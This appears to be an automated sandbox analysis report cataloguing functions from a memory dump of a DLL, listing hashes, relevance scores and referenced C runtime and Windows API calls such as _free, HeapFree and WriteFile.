Opcode ID: 217105fb4d190706416326e58ae614d7964109439107754c12b3f2ac1dab4c0f
Instruction ID: 23fd2a4bd2ba2ab0a39d8d263f38f64ffaf854ee851fdf142d1890f56ae31977
Opcode Fuzzy Hash: 217105fb4d190706416326e58ae614d7964109439107754c12b3f2ac1dab4c0f
Instruction Fuzzy Hash: 7BF03072A25224EBCB16CA8CC444F89B3BDFB49B55F210496E442D7244D7B4DE44E7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB21D, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f68d426fd2ee3ff29f084fb52d3322a2d939e70b27bbf5866002458d6e13c359
Instruction ID: 2c0248688977fec2d2726b0bf03a0cee97f13ae37c937b9ce3079d62d2602aa6
Opcode Fuzzy Hash: f68d426fd2ee3ff29f084fb52d3322a2d939e70b27bbf5866002458d6e13c359
Instruction Fuzzy Hash: ABE06D31614248DFCB05CFA8C544E4AB7F9FB48245F204464E81AC7244E338EE84DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB1DA, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889bff84ebf838007829e1e1fe3adb441a436d016ec99a98544664d153da4dbc
Instruction ID: 658c75af449c5d76df85850955110557e2d80778f6274f94368e0409e21fad31
Opcode Fuzzy Hash: 889bff84ebf838007829e1e1fe3adb441a436d016ec99a98544664d153da4dbc
Instruction Fuzzy Hash: 65E03935614308DFCB05CF99C548A4AB7F9AB48244F204464E41AC7240D334EA84DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB3F8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce74cd70ec418db9a8a37d3b4e6094e1d79549c354652df8da853f6ce8689770
Instruction ID: 94ce75c4d08d8a2915ff218d630ad4dd6aa5037ff69e1aae57c8a016db037055
Opcode Fuzzy Hash: ce74cd70ec418db9a8a37d3b4e6094e1d79549c354652df8da853f6ce8689770
Instruction Fuzzy Hash: 85E08C32A11238EBCB12CBC8C940D9AF3ECEB45E00B1104A6F502D3100C374DE44EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB2BB, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79727b1a7a9455d76849de3c541885d29fecf1654f4f58d7a83399a42cdaf1a7
Instruction ID: 14116087d0696531c64d109a816480358e50627dcc8440a4b49549369fed588f
Opcode Fuzzy Hash: 79727b1a7a9455d76849de3c541885d29fecf1654f4f58d7a83399a42cdaf1a7
Instruction Fuzzy Hash: F7E01235901248EFCB00CF98C584F8DB7F9EB44759F5588A4E405D7250D374EF84DA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB112, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957cca0aa6ad3cd28577249edc1af8c00ed76bef5a9df22a912fe029ba021259
Instruction ID: fe4d7e26d9416d3454d3fb4c57715f40a8808a51d2683e1a5bc6ca875dce96ef
Opcode Fuzzy Hash: 957cca0aa6ad3cd28577249edc1af8c00ed76bef5a9df22a912fe029ba021259
Instruction Fuzzy Hash: FAC0807418160087CD0585509570B983354E3B1F91FD00C8CC817C7645D51D58C7F701

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1D0A, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1E1D79
_free.LIBCMT ref: 6E1E1D8F
_free.LIBCMT ref: 6E1E1DA2
_free.LIBCMT ref: 6E1E1DB7
_free.LIBCMT ref: 6E1E1DCC
GetCPInfo.KERNEL32(?,?), ref: 6E1E1E16

Part of subcall function 6E1EB88C: _free.LIBCMT ref: 6E1EB8F7

_free.LIBCMT ref: 6E1E2081
_free.LIBCMT ref: 6E1E2094
_free.LIBCMT ref: 6E1E20A2
_free.LIBCMT ref: 6E1E20AD
_free.LIBCMT ref: 6E1E20EF
_free.LIBCMT ref: 6E1E20F7
_free.LIBCMT ref: 6E1E20FD
_free.LIBCMT ref: 6E1E2105
_free.LIBCMT ref: 6E1E2113

Strings

PH$n, xrefs: 6E1E2148

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$Info
String ID: PH$n
API String ID: 2509303402-3475153215
Opcode ID: 0109dd05b2197eaf46321eca97b8daf4486efff5a13b9cd8a8db662343e67e02
Instruction ID: f6e69ab3122214cdeb04285fa8574471882bccab73ec139b0822e92d8983ae2d
Opcode Fuzzy Hash: 0109dd05b2197eaf46321eca97b8daf4486efff5a13b9cd8a8db662343e67e02
Instruction Fuzzy Hash: B3D1E171E0060ADFDB01CFA8C890BEEBBF9BF19300F104569F554A7682D771A885DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD546, Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 6E1DD570
_free.LIBCMT ref: 6E1DD649
_free.LIBCMT ref: 6E1DD676

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 4f10f615650b5c5c02e16fce1b7ed4151b27b16e41c3c35c293f62ed6a6ca280
Instruction ID: 6529aa56da65c048c46d5b5445b1e613584dc5efdace3eb2a76721f9684853f5
Opcode Fuzzy Hash: 4f10f615650b5c5c02e16fce1b7ed4151b27b16e41c3c35c293f62ed6a6ca280
Instruction Fuzzy Hash: DCD12771904615AFEB14DFF8C890A9E77F8AF12328F214769E52197280EB3195C8EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E22CE, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E1E2312

Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E336E
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3380
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3392
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33A4
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33B6
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33C8
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33DA
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33EC
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33FE
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3410
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3422
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3434
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3446

_free.LIBCMT ref: 6E1E2307

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E2329
_free.LIBCMT ref: 6E1E233E
_free.LIBCMT ref: 6E1E2349
_free.LIBCMT ref: 6E1E236B
_free.LIBCMT ref: 6E1E237E
_free.LIBCMT ref: 6E1E238C
_free.LIBCMT ref: 6E1E2397
_free.LIBCMT ref: 6E1E23CF
_free.LIBCMT ref: 6E1E23D6
_free.LIBCMT ref: 6E1E23F3
_free.LIBCMT ref: 6E1E240B

Strings

8'n, xrefs: 6E1E22E4

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8'n
API String ID: 161543041-188201432
Opcode ID: 7fda2ffc0feecac8803795e7d27a78909739a392a7b269425ff1ac46cadd4552
Instruction ID: ac456a00eb1d1bd8b0bbcab75d4aa3db430953b3d60d6f885f1b56532b478bc7
Opcode Fuzzy Hash: 7fda2ffc0feecac8803795e7d27a78909739a392a7b269425ff1ac46cadd4552
Instruction Fuzzy Hash: 3231A231608B06DFEB509BB4D864B8A73E9EF14314F204959F169D7950DF74E8C4EB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D76FE, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D7714

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1D7720
_free.LIBCMT ref: 6E1D772B
_free.LIBCMT ref: 6E1D7736
_free.LIBCMT ref: 6E1D7741
_free.LIBCMT ref: 6E1D774C
_free.LIBCMT ref: 6E1D7757
_free.LIBCMT ref: 6E1D7762
_free.LIBCMT ref: 6E1D776D
_free.LIBCMT ref: 6E1D777B

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4a38d7fffb0d8aed2913a8dfd1c0fca969364cb3e8224d959d19b1bb46fc3813
Instruction ID: 2f3a8a90cc5406ce275184ea0580c51870048b5d050efb37faa414355e9ac249
Opcode Fuzzy Hash: 4a38d7fffb0d8aed2913a8dfd1c0fca969364cb3e8224d959d19b1bb46fc3813
Instruction Fuzzy Hash: 8421EA7A91410CEFCB41EFD4C890DDD7BB9BF18244F004AA6E615AB521DB35DA88DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA30C, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1CA6E9

Strings

p, xrefs: 6E1CA41A
p, xrefs: 6E1CA3FE
f, xrefs: 6E1CA3F7
f, xrefs: 6E1CA413
:, xrefs: 6E1CA3CE
p, xrefs: 6E1CA460
f, xrefs: 6E1CA459

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 5bcf7cfe38444a14d44ead6bb87e02e00ee46c27845096e2dcf17161359722db
Instruction ID: 4a4bd99d8a836d9efc56dc2ff4e976957159976108996570c9e4ef5048b4542d
Opcode Fuzzy Hash: 5bcf7cfe38444a14d44ead6bb87e02e00ee46c27845096e2dcf17161359722db
Instruction Fuzzy Hash: E5028E79A002198BEB228FE5D4646DDB772FB20F14F608116D526FB684D7388DC9EB13

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6EBD, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6774e7dbe43fda0b5b3781ee68e8151188341ab95a71b607054718174bc20a
Instruction ID: abea5237fb7761f98dd64f883717daea1e8a7caf2806e668af8b647dec34ab3e
Opcode Fuzzy Hash: 4d6774e7dbe43fda0b5b3781ee68e8151188341ab95a71b607054718174bc20a
Instruction Fuzzy Hash: 4FC1F6B0A18B4AAFEF05CFD9C890BADBBB5FF5A304F10445AF51097682D7709981DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB658, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DB7F2

Strings

*?, xrefs: 6E1DB69B

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 1fb5bc2f0a3f74d3b2cc2f05bcf8fa768755c38a9f5db95e5c6dd433e8dcda04
Instruction ID: bc06fe8266e69ea428ea49df86fcda8c9bbc1075c9fd02caa47e3d7618cfa99d
Opcode Fuzzy Hash: 1fb5bc2f0a3f74d3b2cc2f05bcf8fa768755c38a9f5db95e5c6dd433e8dcda04
Instruction Fuzzy Hash: 7AE16DB5E002199FCB14CFA9C8809EEFBF5EF48710B25856AD816E7344E7349E85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D973E, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

_free.LIBCMT ref: 6E1D9A4B
_free.LIBCMT ref: 6E1D9A64
_free.LIBCMT ref: 6E1D9AA2
_free.LIBCMT ref: 6E1D9AAB
_free.LIBCMT ref: 6E1D9AB7

Strings

C, xrefs: 6E1D989A

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 5a4604f4c2af3c939a354ad18b04d66d6bea8681efbc0921f053ae08612cde51
Instruction ID: 1884f38c12ba277bebffd7a38dc30001e49d6d3c022b13351126fa9d4c566b3d
Opcode Fuzzy Hash: 5a4604f4c2af3c939a354ad18b04d66d6bea8681efbc0921f053ae08612cde51
Instruction Fuzzy Hash: 60C16B75A0122A9FDB24DF98C8A4A9DB3B5FF58304F2045EAD909A7350E770AED4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D92B3, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DF6DA: RtlAllocateHeap.NTDLL(00000000,000000FF,000000FF), ref: 6E1DF70C

_free.LIBCMT ref: 6E1D93C2
_free.LIBCMT ref: 6E1D93D9
_free.LIBCMT ref: 6E1D93F6
_free.LIBCMT ref: 6E1D9411
_free.LIBCMT ref: 6E1D9428

Strings

K$n, xrefs: 6E1D9306

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: K$n
API String ID: 3033488037-208850606
Opcode ID: 2cef904aee2e5e32508ee2ef47d6eddf69a090ce83fbc9dbd71100e15eb5c596
Instruction ID: 1c671f633f9248faf9df5a9621da0d56624cacf300a2eb38360c88a5d0a55a22
Opcode Fuzzy Hash: 2cef904aee2e5e32508ee2ef47d6eddf69a090ce83fbc9dbd71100e15eb5c596
Instruction Fuzzy Hash: 6951F372A04605EFDB11CFADC8A1B9A73F9EF58324F200669E415DB290E771E985DB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3E04, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E1E3AEF: _free.LIBCMT ref: 6E1E3B14

_free.LIBCMT ref: 6E1E3E52

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E3E5D
_free.LIBCMT ref: 6E1E3E68
_free.LIBCMT ref: 6E1E3EBC
_free.LIBCMT ref: 6E1E3EC7
_free.LIBCMT ref: 6E1E3ED2
_free.LIBCMT ref: 6E1E3EDD

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 75faa5f3869be2b1b32b9dd7925961a73806d4ee6c0b8a03090f7478cc611a18
Instruction ID: cdac3c1d58a38ca979887674ad6460eae48730b16b6d0ee66f44b918e0c37183
Opcode Fuzzy Hash: 75faa5f3869be2b1b32b9dd7925961a73806d4ee6c0b8a03090f7478cc611a18
Instruction Fuzzy Hash: 55116D31590B08EBD520E7F1CC49FCB77DC9F40704F410C14B2A9B6461EB2AE9C56660

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5CCA, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 6E1E5D12
__fassign.LIBCMT ref: 6E1E5EF1
__fassign.LIBCMT ref: 6E1E5F0E
WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1E5F56
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1E5F96
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1E6042

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: d81a20376d641e8e699562407d569c09feed7e92fe795025f035ae9b9cbdddfa
Instruction ID: fee869cc93a00c91eed550c4141bfb9add2cc661b9757dcf7f76a3abcdc2bc3c
Opcode Fuzzy Hash: d81a20376d641e8e699562407d569c09feed7e92fe795025f035ae9b9cbdddfa
Instruction Fuzzy Hash: CFD1ABB1D006599FDF15CFE8C8809EDBBB5BF09304F24016AE965FB242D730A986DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC3C1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1DC3C6

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 2ad29f4793b2e0085aa899e6740ee9eb38c0fbfb9297ce7c80aee9135e290fa7
Instruction ID: 29c18c01de684e3beca1f1e22061f4cee21b60fdd7184f929539c4cebfd692ba
Opcode Fuzzy Hash: 2ad29f4793b2e0085aa899e6740ee9eb38c0fbfb9297ce7c80aee9135e290fa7
Instruction Fuzzy Hash: EA219271204215BFD712DEF58C409AB77ADEF413687218E14E555DB140EB30ECC8EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E383E, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1E3856

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E3868
_free.LIBCMT ref: 6E1E387A
_free.LIBCMT ref: 6E1E388C
_free.LIBCMT ref: 6E1E389E

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 291e694f83395eb12b6eb7eec8cd8d87c7fd24581eef7aec0f74801880472730
Instruction ID: 1ec6db3c60b1c4bb4eb68d1cc0ada0afe9d07ddf7d1eedcfa0a8b6db1e645a04
Opcode Fuzzy Hash: 291e694f83395eb12b6eb7eec8cd8d87c7fd24581eef7aec0f74801880472730
Instruction Fuzzy Hash: 07F04F71458A189BCE84DA98E1D8C8A73DEEA117147601E49F128D7D40C734F8C1AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF7A3, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E1DF82A

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 171435b5a8bdbf964f5834635ee3c3edfac2db330efffc875cd1ef04e4992003
Instruction ID: 8691fe34c754b06597c698f86a893f25c12367394b9cc14d2be54d070424f0f9
Opcode Fuzzy Hash: 171435b5a8bdbf964f5834635ee3c3edfac2db330efffc875cd1ef04e4992003
Instruction Fuzzy Hash: 4EB13732D042469FDB05CFA8C850BEEBBF5EF59300F34846AE8659B341D3348A8ADB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EAFA6, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1EB076
_free.LIBCMT ref: 6E1EB09F
SetEndOfFile.KERNEL32(00000000,6E1E0E5E,00000000,00074000,?,?,?,?,?,?,?,6E1E0E5E,00074000,00000000), ref: 6E1EB0D1
GetLastError.KERNEL32(?,?,?,?,?,?,?,6E1E0E5E,00074000,00000000), ref: 6E1EB0ED

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 0ed672c6cd98b9494ae103cb1bbfe4f6a491a49005926203af888ab4b2a4215b
Instruction ID: c126ce50b92f4156d23e692048c9039697f0868184c569d8380d29ca1aa0c822
Opcode Fuzzy Hash: 0ed672c6cd98b9494ae103cb1bbfe4f6a491a49005926203af888ab4b2a4215b
Instruction Fuzzy Hash: CD41D272600B05DADB319AE8CC41FEE37B9EF55324F250910F524A7998EB34E8C4A721

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB54F, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DC15D: _free.LIBCMT ref: 6E1DC16B

Part of subcall function 6E1DD365: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,7FFFFFFF,?,00000001,?,00000000,0000FFFF,?,6E1D6714,?,00000000,?), ref: 6E1DD407

GetLastError.KERNEL32 ref: 6E1DB5B7
__dosmaperr.LIBCMT ref: 6E1DB5BE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E1DB5FD
__dosmaperr.LIBCMT ref: 6E1DB604

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3d845d838bb3072a2a996eac4e635f7c83e45ef1882279831f088dc7681c6663
Instruction ID: 3eb17d9623b793b09a1c853465148f9af1c5cf8f56afce41f3b136a44851d8fd
Opcode Fuzzy Hash: 3d845d838bb3072a2a996eac4e635f7c83e45ef1882279831f088dc7681c6663
Instruction Fuzzy Hash: 4E2198B1604615FFDB119FE68C80C5777ADEF553A87108A24F52AD7194D730ECC8ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE226, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c1b250ccd2dbd4e06afb2022931430693c7293d59feee33e7ec191041211d3
Instruction ID: 87c5dccd91b3f87284a4f0b1925a83e9aad684a5f2d9d4cab63f44a525424e54
Opcode Fuzzy Hash: f2c1b250ccd2dbd4e06afb2022931430693c7293d59feee33e7ec191041211d3
Instruction Fuzzy Hash: 4B215732D05621EBDB128AE9CC44F4BB379AF22761F210521ED15A7280D730EE48E6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7990, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
_free.LIBCMT ref: 6E1D79F2
_free.LIBCMT ref: 6E1D7A28
SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 18ab25c723d23b5e58a05c54df4542aa3a39f22174885b5a7d04c6db69cb399c
Instruction ID: 905cd6171588737b4df37ef71a9d593410af362c326efa908d15f7126e46b33f
Opcode Fuzzy Hash: 18ab25c723d23b5e58a05c54df4542aa3a39f22174885b5a7d04c6db69cb399c
Instruction Fuzzy Hash: 2F11E3332089116BEA4155F98C88DDB215EDBE2679B35062AF535D71C0EF618CCDE131

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7AE7, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1D550A,6E1C8408,6E1BE215), ref: 6E1D7AEC
_free.LIBCMT ref: 6E1D7B49
_free.LIBCMT ref: 6E1D7B7F
SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,?,?,6E1D550A,6E1C8408,6E1BE215), ref: 6E1D7B8A

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8bf255d2a945237b5beb7ee6fcef3c1ff016bd3be842278080166e41314baf43
Instruction ID: 80dc40f7f931f0bd72e9a011ae3aa6e891535f4b2cc043d7d755eaa544e763a9
Opcode Fuzzy Hash: 8bf255d2a945237b5beb7ee6fcef3c1ff016bd3be842278080166e41314baf43
Instruction Fuzzy Hash: F911C232208A156AEE4195F9DC89D9A355EEBE2679B250A3AF534D71C0DF218CCDE130

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7851, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6E1D7855
_free.LIBCMT ref: 6E1D78D6
SetLastError.KERNEL32(00000000), ref: 6E1D78F7

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6c0202d020ea346254db4a47c700883dd89c2dd04c5a92cf704b6c6ddaa8d5ab
Instruction ID: 3b58fb4423553edf38038bbbbbfda4f4a4f48914cfa44bbe818ca92d0bd3b836
Opcode Fuzzy Hash: 6c0202d020ea346254db4a47c700883dd89c2dd04c5a92cf704b6c6ddaa8d5ab
Instruction Fuzzy Hash: B311E931A4C615AFEA4156F98CCDDC7755DDF223A9B200636F120D61C0DB518CDDE170

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ECEDC, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000), ref: 6E1ECEF3
GetLastError.KERNEL32(?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000,00000000,?,6E1E6604,00000020), ref: 6E1ECEFF

Part of subcall function 6E1ECEC5: CloseHandle.KERNEL32(6E27E8A0,6E1ECF0F,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000,00000000), ref: 6E1ECED5

___initconout.LIBCMT ref: 6E1ECF0F

